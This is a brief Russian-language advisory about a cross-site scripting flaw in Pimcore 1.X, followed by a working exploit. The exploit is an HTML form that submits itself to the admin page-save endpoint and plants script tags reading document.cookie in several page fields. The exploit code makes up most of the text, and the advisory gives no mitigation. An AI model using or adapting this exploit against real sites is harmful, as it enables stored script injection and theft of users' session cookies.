Программа: Pimcore 1.X
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<form action="http://host/admin/page/save/task/publish" method="post"
name="main" >
<input type="hidden" name="data" value='{"headernote": {"data":
"Powerful CMS"><script>alert(document.cookie)</script>",
"type": "textarea"}, "headline": {"data": "The truth about pimcore",
"type": "input"}, "contentblock": {"data": ["1"], "type": "block"},
"blocktypecontentblock1": {"data": null, "type": "select"},
"sublinecontentblock1": {"data": "Content management ala pimcore",
"type": "input"}, "contentcontentblock1": {"data":
"<p>\n\tPimcore</p>\n\"><script>alert(document.cookie)</script>",
"type": "wysiwyg"}}' />
<input type="hidden" name="id" value="1440" />
</form>
<script>
document.main.submit();
</script>
|